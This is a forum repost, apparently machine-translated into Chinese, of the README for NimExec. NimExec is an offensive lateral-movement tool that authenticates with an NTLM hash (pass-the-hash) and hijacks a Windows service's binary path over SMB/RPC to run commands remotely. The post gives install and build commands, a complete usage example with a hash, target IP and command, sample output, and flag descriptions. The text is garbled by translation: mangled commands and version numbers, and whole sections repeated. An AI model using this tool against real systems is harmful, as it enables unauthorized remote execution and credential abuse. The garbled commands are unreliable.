taibeihacker
Moderator
基本上,Nimexec是使用Service Control Manager远程协议(MS-SCMR)的无备远程命令执行工具。它更改了由当地系统运行的随机或给定服务的二进制路径,以在目标上执行给定命令,并通过手工制作的RPC数据包而不是Winapi调用来恢复它。它通过SMB2和名为Pipe的SVCCTL发送这些软件包。
Nimexec需要一个NTLM哈希来对目标机进行身份验证,然后通过手工制作的软件包使用NTLM身份验证方法完成此身份验证过程。
由于所有必需的网络软件包都是手动制作的,并且没有使用特定于操作系统的功能,因此可以通过使用NIM的跨补偿性支持在不同的操作系统中使用NIMEXEC。
该项目的灵感来自Julio的SharpNopSexec工具。您可以认为Nimexec是可以交叉编译的,并且可以内置通过支持的SharpNopSexec。另外,我从凯文马云惹不起马云罗伯逊(Kevin Robertson)的Invoke-SmbExec脚本中学到了所需的网络数据包结构。
另外,您可以使用以下命令:通过敏捷安装所需的NIM模块
nimble install ptr_math nimcrypto hostname
_._
。-'_._''。
_._ .---。 _______________________________________________________________。' '。\
。' '。 | __ || |/`。' ` .-'''。-'''。 /。'
.-。-- .-。 '/.--'''-。 `/.--'''-。 ` 。 '
| ''|| || | | | | | |//__________ _____///__________ \ \ | |
| | | | | | | | | | | |`。 \。 /| || || || |
| | | | | | | | | | | | | \。----------------------'。 `'。' \。---------------------------'。 '
| | | | | | | | | | | \'-.____.---。 '。' \'-._____.---。 \'。' \'-._____.---。 \'。
| | | ||| __ | __ | | __ | | __ | ``。'' 。' ` ``。'' '。 ` 。' '。 `._____.--'/
| | | `''-.-'。'。 ` '''--. - ' - .______ /
| | | | 。' /`。 ` `
' - ' - ' - '---''----'
@r0h1rr1m
[+]连接到10.200.2.2:445
[+]带有哈希的NTLM身份验证成功!
[+]连接到目标的IPC共享!
[+]打开了SVCCTL管的手柄!
[+]绑定到RPC接口!
[+] RPC绑定已得到认可!
[+]获得了Scmanager手柄!
[+]获得的服务的数量: 265
[+]选定的服务是LXPSVC
[+] Service: LXPSVC已打开!
[+]先前的服务路径IS: C: \ Windows \ System32 \ svchost.exe -k netsvcs
[+]服务配置已更改!
[!] starterViceW返回value: 1053(error_service_request_timeout)
[+]服务开始请求已发送!
[+]服务配置已恢复!
[+]服务手柄已关闭!
[+]服务经理手柄已关闭!
[+] SMB已关闭!
[+]树是断开连接的!
[+]会话记录!它已针对Windows 1011,Windows Server 161922从Ubuntu 20.04和Windows 10机器进行了测试。
-u | - 使用NTLM身份验证的用户名用户名。**
-h | - HASH NTLM HASH NTLM密码Hash用于NTLM身份验证。**
-t | - 目标目标侧向运动目标。*
-c | - 命令命令执行。*
-d | - NTLM身份验证的域域名。
-s | - 服务服务名称的名称,而不是随机的服务名称。
- 主持人显示帮助消息。
Nimexec需要一个NTLM哈希来对目标机进行身份验证,然后通过手工制作的软件包使用NTLM身份验证方法完成此身份验证过程。
由于所有必需的网络软件包都是手动制作的,并且没有使用特定于操作系统的功能,因此可以通过使用NIM的跨补偿性支持在不同的操作系统中使用NIMEXEC。
该项目的灵感来自Julio的SharpNopSexec工具。您可以认为Nimexec是可以交叉编译的,并且可以内置通过支持的SharpNopSexec。另外,我从凯文马云惹不起马云罗伯逊(Kevin Robertson)的Invoke-SmbExec脚本中学到了所需的网络数据包结构。
Compilation
NIM C -D:REELES -GC:markAndSweep -O:NimeXec.exe Main.NIM上述命令使用其他垃圾收集器,因为NIM中的默认垃圾收集器在服务搜索过程中引发了一些SigSegvv的错误。另外,您可以使用以下命令:通过敏捷安装所需的NIM模块
nimble install ptr_math nimcrypto hostname
Usage
test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c 'echo test C: \ Users \ public \ test.txt''-v_._
。-'_._''。
_._ .---。 _______________________________________________________________。' '。\
。' '。 | __ || |/`。' ` .-'''。-'''。 /。'
.-。-- .-。 '/.--'''-。 `/.--'''-。 ` 。 '
| ''|| || | | | | | |//__________ _____///__________ \ \ | |
| | | | | | | | | | | |`。 \。 /| || || || |
| | | | | | | | | | | | | \。----------------------'。 `'。' \。---------------------------'。 '
| | | | | | | | | | | \'-.____.---。 '。' \'-._____.---。 \'。' \'-._____.---。 \'。
| | | ||| __ | __ | | __ | | __ | ``。'' 。' ` ``。'' '。 ` 。' '。 `._____.--'/
| | | `''-.-'。'。 ` '''--. - ' - .______ /
| | | | 。' /`。 ` `
' - ' - ' - '---''----'
@r0h1rr1m
[+]连接到10.200.2.2:445
[+]带有哈希的NTLM身份验证成功!
[+]连接到目标的IPC共享!
[+]打开了SVCCTL管的手柄!
[+]绑定到RPC接口!
[+] RPC绑定已得到认可!
[+]获得了Scmanager手柄!
[+]获得的服务的数量: 265
[+]选定的服务是LXPSVC
[+] Service: LXPSVC已打开!
[+]先前的服务路径IS: C: \ Windows \ System32 \ svchost.exe -k netsvcs
[+]服务配置已更改!
[!] starterViceW返回value: 1053(error_service_request_timeout)
[+]服务开始请求已发送!
[+]服务配置已恢复!
[+]服务手柄已关闭!
[+]服务经理手柄已关闭!
[+] SMB已关闭!
[+]树是断开连接的!
[+]会话记录!它已针对Windows 1011,Windows Server 161922从Ubuntu 20.04和Windows 10机器进行了测试。
Command Line Parameters
-V | - verbose启用更多的详细输出。-u | - 使用NTLM身份验证的用户名用户名。**
-h | - HASH NTLM HASH NTLM密码Hash用于NTLM身份验证。**
-t | - 目标目标侧向运动目标。*
-c | - 命令命令执行。*
-d | - NTLM身份验证的域域名。
-s | - 服务服务名称的名称,而不是随机的服务名称。
- 主持人显示帮助消息。